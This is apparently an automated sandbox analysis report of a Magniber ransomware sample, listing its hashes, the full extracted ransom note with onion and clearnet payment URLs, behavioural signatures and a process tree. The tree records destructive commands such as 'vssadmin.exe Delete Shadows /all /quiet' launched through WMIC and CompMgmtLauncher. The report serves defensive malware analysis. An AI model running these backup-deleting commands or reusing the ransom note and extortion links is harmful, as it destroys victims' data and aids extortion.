Analysis

  • max time kernel
    99s
  • max time network
    177s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-06-2021 14:06

General

  • Target

    4.exe

  • Size

    21KB

  • MD5

    191889cccd8827cb28b5cf9c3a559366

  • SHA1

    c1a6bc0e5d66524eaefa935e9d1dca0c9223bead

  • SHA256

    5301e5deb37674296e48d5873862ce32f934fbdfe1a7919f97bddb1138957e35

  • SHA512

    6d3af286eaa1c3051a739edeaa5f5684f31ff0575082bcd1c2155acfa82657b06b70d7aefc55be3dc1f0877cd4ca77b13f9e53720f5123339bf85eb36bfdfcdf

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://2604a8602014c040e8uxkhdcf.ndkeblzjnpqgpo5o.onion/uxkhdcf
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://2604a8602014c040e8uxkhdcf.bejoin.space/uxkhdcf
http://2604a8602014c040e8uxkhdcf.lieedge.casa/uxkhdcf
http://2604a8602014c040e8uxkhdcf.wonride.site/uxkhdcf
http://2604a8602014c040e8uxkhdcf.lognear.xyz/uxkhdcf
Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://2604a8602014c040e8uxkhdcf.ndkeblzjnpqgpo5o.onion/uxkhdcf

http://2604a8602014c040e8uxkhdcf.bejoin.space/uxkhdcf

http://2604a8602014c040e8uxkhdcf.lieedge.casa/uxkhdcf

http://2604a8602014c040e8uxkhdcf.wonride.site/uxkhdcf

http://2604a8602014c040e8uxkhdcf.lognear.xyz/uxkhdcf

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Users\Admin\AppData\Local\Temp\4.exe
      "C:\Users\Admin\AppData\Local\Temp\4.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:1632
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1140
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:760
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1108
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1212
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1644
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1944
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
      • Modifies extensions of user files
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1128
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:2032
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://2604a8602014c040e8uxkhdcf.bejoin.space/uxkhdcf^&1^&47753674^&86^&357^&12"
        2⤵
          PID:760
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://2604a8602014c040e8uxkhdcf.bejoin.space/uxkhdcf&1&47753674&86&357&12
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:340
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:340 CREDAT:275457 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:1424
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1180
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:432
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2124
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
            PID:2348
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:2596
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:2140
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2224
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2504
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              1⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:2156
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2320
                • C:\Windows\system32\wbem\wmic.exe
                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                    PID:2520
              • C:\Windows\system32\cmd.exe
                cmd /c CompMgmtLauncher.exe
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:2164
                • C:\Windows\system32\CompMgmtLauncher.exe
                  CompMgmtLauncher.exe
                  2⤵
                    PID:2300
                    • C:\Windows\system32\wbem\wmic.exe
                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                      3⤵
                        PID:2572
                  • C:\Windows\system32\cmd.exe
                    cmd /c CompMgmtLauncher.exe
                    1⤵
                    • Process spawned unexpected child process
                    • Suspicious use of WriteProcessMemory
                    PID:2132
                    • C:\Windows\system32\CompMgmtLauncher.exe
                      CompMgmtLauncher.exe
                      2⤵
                        PID:2332
                        • C:\Windows\system32\wbem\wmic.exe
                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                          3⤵
                            PID:2684
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2708
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2816
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2848
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2868
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2944
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                          PID:2968

                        Network

                        MITRE ATT&CK Enterprise v6

                        Downloads

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\BJ15GQRU.txt

                        • C:\Users\Admin\Desktop\AssertTrace.wps.uxkhdcf

                        • C:\Users\Admin\Desktop\BackupSplit.asp.uxkhdcf

                        • C:\Users\Admin\Desktop\CompleteRemove.pps.uxkhdcf

                        • C:\Users\Admin\Desktop\CompressStart.tiff.uxkhdcf

                        • C:\Users\Admin\Desktop\ConnectPush.docm.uxkhdcf

                        • C:\Users\Admin\Desktop\ConvertFromSync.doc.uxkhdcf

                        • C:\Users\Admin\Desktop\DisconnectRead.svgz.uxkhdcf

                        • C:\Users\Admin\Desktop\HideExpand.ods.uxkhdcf

                        • C:\Users\Admin\Desktop\ReadUpdate.ppsm.uxkhdcf

                        • C:\Users\Admin\Desktop\RedoHide.pps.uxkhdcf

                        • C:\Users\Admin\Desktop\ResumeWait.asf.uxkhdcf

                        • C:\Users\Admin\Desktop\RevokeOptimize.pps.uxkhdcf

                        • C:\Users\Admin\Desktop\SaveSet.bmp.uxkhdcf

                        • C:\Users\Admin\Desktop\UnpublishRevoke.wav.uxkhdcf

                        • C:\Users\Admin\Desktop\UpdateExpand.jfif.uxkhdcf

                        • C:\Users\Admin\Desktop\readme.txt

                        • C:\Users\Public\readme.txt
